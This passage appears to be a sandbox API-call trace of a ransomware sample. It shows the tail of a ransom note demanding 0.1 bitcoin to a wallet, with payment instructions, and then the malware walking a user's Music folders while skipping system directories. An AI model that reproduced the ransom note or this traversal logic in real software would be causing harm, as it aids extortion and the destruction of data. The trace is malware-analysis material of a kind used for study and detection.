ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.696] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.697] CloseHandle (hObject=0x7a0) returned 1 [0075.697] GetProcessHeap () returned 0x4f10000 [0075.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cd1078 | out: hHeap=0x4f10000) returned 1 [0075.697] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x282ab30, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x282ab30, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Music", cAlternateFileName="")) returned 1 [0075.697] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 39 [0075.697] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0075.697] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0075.697] StrStrW (lpFirst="music", lpSrch="programdata") returned 0x0 [0075.697] StrStrW (lpFirst="music", lpSrch="$recycle.bin") returned 0x0 [0075.697] StrStrW (lpFirst="music", lpSrch="program files") returned 0x0 [0075.697] StrStrW (lpFirst="music", lpSrch="windows") returned 0x0 [0075.697] StrStrW (lpFirst="music", lpSrch="all users") returned 0x0 [0075.697] StrStrW (lpFirst="music", lpSrch="appdata") returned 0x0 [0075.697] GetProcessHeap () returned 0x4f10000 [0075.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cd1078 [0075.697] lstrcpyW (in: lpString1=0x8cd1078, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0075.697] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 67 [0075.697] QueueUserWorkItem (Function=0x40a710, Context=0x8cd1078, Flags=0x0) returned 1 [0075.697] GetProcessHeap () returned 0x4f10000 [0075.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ce1080 [0075.698] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 41 [0075.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.698] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\.") returned 41 [0075.698] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.698] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.698] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.698] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\..") returned 42 [0075.699] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.699] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b394170, ftCreationTime.dwHighDateTime=0x1d4ca18, ftLastAccessTime.dwLowDateTime=0x20b6fe50, ftLastAccessTime.dwHighDateTime=0x1d4ced0, ftLastWriteTime.dwLowDateTime=0x20b6fe50, ftLastWriteTime.dwHighDateTime=0x1d4ced0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="3irpEEnGfRfssd", cAlternateFileName="3IRPEE~1")) returned 1 [0075.699] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd") returned 54 [0075.699] lstrcmpW (lpString1="3irpEEnGfRfssd", lpString2="..") returned 1 [0075.699] lstrcmpW (lpString1="3irpEEnGfRfssd", lpString2=".") returned 1 [0075.699] StrStrW (lpFirst="3irpeengfrfssd", lpSrch="programdata") returned 0x0 [0075.699] StrStrW (lpFirst="3irpeengfrfssd", lpSrch="$recycle.bin") returned 0x0 [0075.699] StrStrW (lpFirst="3irpeengfrfssd", lpSrch="program files") returned 0x0 [0075.699] StrStrW (lpFirst="3irpeengfrfssd", lpSrch="windows") returned 0x0 [0075.699] StrStrW (lpFirst="3irpeengfrfssd", lpSrch="all users") returned 0x0 [0075.699] StrStrW (lpFirst="3irpeengfrfssd", lpSrch="appdata") returned 0x0 [0075.699] GetProcessHeap () returned 0x4f10000 [0075.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cf1088 [0075.700] lstrcpyW (in: lpString1=0x8cf1088, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd" [0075.700] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 68 [0075.700] QueueUserWorkItem (Function=0x40a710, Context=0x8cf1088, Flags=0x0) returned 1 [0075.700] GetProcessHeap () returned 0x4f10000 [0075.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d01090 [0075.703] wnsprintfW (in: pszDest=0x8d01090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\*") returned 56 [0075.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b394170, ftCreationTime.dwHighDateTime=0x1d4ca18, ftLastAccessTime.dwLowDateTime=0x20b6fe50, ftLastAccessTime.dwHighDateTime=0x1d4ced0, ftLastWriteTime.dwLowDateTime=0x20b6fe50, ftLastWriteTime.dwHighDateTime=0x1d4ced0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.704] wnsprintfW (in: pszDest=0x8d01090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\.") returned 56 [0075.704] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.704] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.704] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b394170, ftCreationTime.dwHighDateTime=0x1d4ca18, ftLastAccessTime.dwLowDateTime=0x20b6fe50, ftLastAccessTime.dwHighDateTime=0x1d4ced0, ftLastWriteTime.dwLowDateTime=0x20b6fe50, ftLastWriteTime.dwHighDateTime=0x1d4ced0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.704] wnsprintfW (in: pszDest=0x8d01090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\..") returned 57 [0075.704] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.704] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0bda90, ftCreationTime.dwHighDateTime=0x1d4cfbb, ftLastAccessTime.dwLowDateTime=0x1be9f240, ftLastAccessTime.dwHighDateTime=0x1d4ce96, ftLastWriteTime.dwLowDateTime=0x1be9f240, ftLastWriteTime.dwHighDateTime=0x1d4ce96, nFileSizeHigh=0x0, nFileSizeLow=0x177d4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BSTXsZ.mp3", cAlternateFileName="")) returned 1 [0075.704] wnsprintfW (in: pszDest=0x8d01090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\BSTXsZ.mp3") returned 65 [0075.704] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x884831a0, ftCreationTime.dwHighDateTime=0x1d4c66b, ftLastAccessTime.dwLowDateTime=0xfc2c0790, ftLastAccessTime.dwHighDateTime=0x1d4cd87, ftLastWriteTime.dwLowDateTime=0xfc2c0790, ftLastWriteTime.dwHighDateTime=0x1d4cd87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="H2vk_", cAlternateFileName="")) returned 1 [0075.704] wnsprintfW (in: pszDest=0x8d01090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_") returned 60 [0075.704] lstrcmpW (lpString1="H2vk_", lpString2="..") returned 1 [0075.704] lstrcmpW (lpString1="H2vk_", lpString2=".") returned 1 [0075.704] StrStrW (lpFirst="h2vk_", lpSrch="programdata") returned 0x0 [0075.704] StrStrW (lpFirst="h2vk_", lpSrch="$recycle.bin") returned 0x0 [0075.704] StrStrW (lpFirst="h2vk_", lpSrch="program files") returned 0x0 [0075.704] StrStrW (lpFirst="h2vk_", lpSrch="windows") returned 0x0 [0075.704] StrStrW (lpFirst="h2vk_", lpSrch="all users") returned 0x0 [0075.704] StrStrW (lpFirst="h2vk_", lpSrch="appdata") returned 0x0 [0075.704] GetProcessHeap () returned 0x4f10000 [0075.704] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d11098 [0075.705] lstrcpyW (in: lpString1=0x8d11098, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_" [0075.705] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 69 [0075.705] QueueUserWorkItem (Function=0x40a710, Context=0x8d11098, Flags=0x0) returned 1 [0075.705] GetProcessHeap () returned 0x4f10000 [0075.705] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d210a0 [0075.706] wnsprintfW (in: pszDest=0x8d210a0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\*") returned 62 [0075.706] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x884831a0, ftCreationTime.dwHighDateTime=0x1d4c66b, ftLastAccessTime.dwLowDateTime=0xfc2c0790, ftLastAccessTime.dwHighDateTime=0x1d4cd87, ftLastWriteTime.dwLowDateTime=0xfc2c0790, ftLastWriteTime.dwHighDateTime=0x1d4cd87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.706] wnsprintfW (in: pszDest=0x8d210a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\.") returned 62 [0075.706] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.706] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.706] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x884831a0, ftCreationTime.dwHighDateTime=0x1d4c66b, ftLastAccessTime.dwLowDateTime=0xfc2c0790, ftLastAccessTime.dwHighDateTime=0x1d4cd87, ftLastWriteTime.dwLowDateTime=0xfc2c0790, ftLastWriteTime.dwHighDateTime=0x1d4cd87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.706] wnsprintfW (in: pszDest=0x8d210a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\..") returned 63 [0075.706] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.707] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e70cfd0, ftCreationTime.dwHighDateTime=0x1d4d0d5, ftLastAccessTime.dwLowDateTime=0xd4fb1e80, ftLastAccessTime.dwHighDateTime=0x1d4d3dc, ftLastWriteTime.dwLowDateTime=0xd4fb1e80, ftLastWriteTime.dwHighDateTime=0x1d4d3dc, nFileSizeHigh=0x0, nFileSizeLow=0xef4e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="GfZaeOxJ.wav", cAlternateFileName="")) returned 1 [0075.707] wnsprintfW (in: pszDest=0x8d210a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\GfZaeOxJ.wav") returned 73 [0075.707] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f9b9f10, ftCreationTime.dwHighDateTime=0x1d4d148, ftLastAccessTime.dwLowDateTime=0xef2e0740, ftLastAccessTime.dwHighDateTime=0x1d4ce00, ftLastWriteTime.dwLowDateTime=0xef2e0740, ftLastWriteTime.dwHighDateTime=0x1d4ce00, nFileSizeHigh=0x0, nFileSizeLow=0x18c42, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SzLBr.m4a", cAlternateFileName="")) returned 1 [0075.707] wnsprintfW (in: pszDest=0x8d210a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\SzLBr.m4a") returned 70 [0075.707] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x665df330, ftCreationTime.dwHighDateTime=0x1d4c630, ftLastAccessTime.dwLowDateTime=0x7b2b5930, ftLastAccessTime.dwHighDateTime=0x1d4cd3b, ftLastWriteTime.dwLowDateTime=0x7b2b5930, ftLastWriteTime.dwHighDateTime=0x1d4cd3b, nFileSizeHigh=0x0, nFileSizeLow=0x13ffd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zCnP0SsfIwje8h7k.wav", cAlternateFileName="ZCNP0S~1.WAV")) returned 1 [0075.707] wnsprintfW (in: pszDest=0x8d210a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\zCnP0SsfIwje8h7k.wav") returned 81 [0075.707] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5eef1a30, ftCreationTime.dwHighDateTime=0x1d4c9c7, ftLastAccessTime.dwLowDateTime=0xc95dc200, ftLastAccessTime.dwHighDateTime=0x1d4cac5, ftLastWriteTime.dwLowDateTime=0xc95dc200, ftLastWriteTime.dwHighDateTime=0x1d4cac5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_9bVvSR0NC3", cAlternateFileName="_9BVVS~1")) returned 1 [0075.707] wnsprintfW (in: pszDest=0x8d210a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3") returned 72 [0075.707] lstrcmpW (lpString1="_9bVvSR0NC3", lpString2="..") returned 1 [0075.707] lstrcmpW (lpString1="_9bVvSR0NC3", lpString2=".") returned 1 [0075.707] StrStrW (lpFirst="_9bvvsr0nc3", lpSrch="programdata") returned 0x0 [0075.707] StrStrW (lpFirst="_9bvvsr0nc3", lpSrch="$recycle.bin") returned 0x0 [0075.707] StrStrW (lpFirst="_9bvvsr0nc3", lpSrch="program files") returned 0x0 [0075.707] StrStrW (lpFirst="_9bvvsr0nc3", lpSrch="windows") returned 0x0 [0075.707] StrStrW (lpFirst="_9bvvsr0nc3", lpSrch="all users") returned 0x0 [0075.707] StrStrW (lpFirst="_9bvvsr0nc3", lpSrch="appdata") returned 0x0 [0075.707] GetProcessHeap () returned 0x4f10000 [0075.707] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d310a8 [0075.708] lstrcpyW (in: lpString1=0x8d310a8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3" [0075.708] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 70 [0075.708] QueueUserWorkItem (Function=0x40a710, Context=0x8d310a8, Flags=0x0) returned 1 [0075.708] GetProcessHeap () returned 0x4f10000 [0075.708] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d410b0 [0075.709] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\*") returned 74 [0075.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\*", lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5eef1a30, ftCreationTime.dwHighDateTime=0x1d4c9c7, ftLastAccessTime.dwLowDateTime=0xc95dc200, ftLastAccessTime.dwHighDateTime=0x1d4cac5, ftLastWriteTime.dwLowDateTime=0xc95dc200, ftLastWriteTime.dwHighDateTime=0x1d4cac5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfea28 [0075.709] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\.") returned 74 [0075.709] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.709] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.709] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5eef1a30, ftCreationTime.dwHighDateTime=0x1d4c9c7, ftLastAccessTime.dwLowDateTime=0xc95dc200, ftLastAccessTime.dwHighDateTime=0x1d4cac5, ftLastWriteTime.dwLowDateTime=0xc95dc200, ftLastWriteTime.dwHighDateTime=0x1d4cac5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.709] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\..") returned 75 [0075.709] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.709] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5599f40, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x93b8d120, ftLastAccessTime.dwHighDateTime=0x1d4c995, ftLastWriteTime.dwLowDateTime=0x93b8d120, ftLastWriteTime.dwHighDateTime=0x1d4c995, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="0bfITs5We", cAlternateFileName="0BFITS~1")) returned 1 [0075.709] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We") returned 82 [0075.709] lstrcmpW (lpString1="0bfITs5We", lpString2="..") returned 1 [0075.709] lstrcmpW (lpString1="0bfITs5We", lpString2=".") returned 1 [0075.709] StrStrW (lpFirst="0bfits5we", lpSrch="programdata") returned 0x0 [0075.709] StrStrW (lpFirst="0bfits5we", lpSrch="$recycle.bin") returned 0x0 [0075.710] StrStrW (lpFirst="0bfits5we", lpSrch="program files") returned 0x0 [0075.710] StrStrW (lpFirst="0bfits5we", lpSrch="windows") returned 0x0 [0075.710] StrStrW (lpFirst="0bfits5we", lpSrch="all users") returned 0x0 [0075.710] StrStrW (lpFirst="0bfits5we", lpSrch="appdata") returned 0x0 [0075.710] GetProcessHeap () returned 0x4f10000 [0075.710] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d510b8 [0075.711] lstrcpyW (in: lpString1=0x8d510b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We" [0075.711] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 71 [0075.711] QueueUserWorkItem (Function=0x40a710, Context=0x8d510b8, Flags=0x0) returned 1 [0075.711] GetProcessHeap () returned 0x4f10000 [0075.711] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d610c0 [0075.759] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\*") returned 84 [0075.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\*", lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5599f40, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x93b8d120, ftLastAccessTime.dwHighDateTime=0x1d4c995, ftLastWriteTime.dwLowDateTime=0x93b8d120, ftLastWriteTime.dwHighDateTime=0x1d4c995, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfea68 [0075.759] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\.") returned 84 [0075.759] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.759] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.759] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x10, 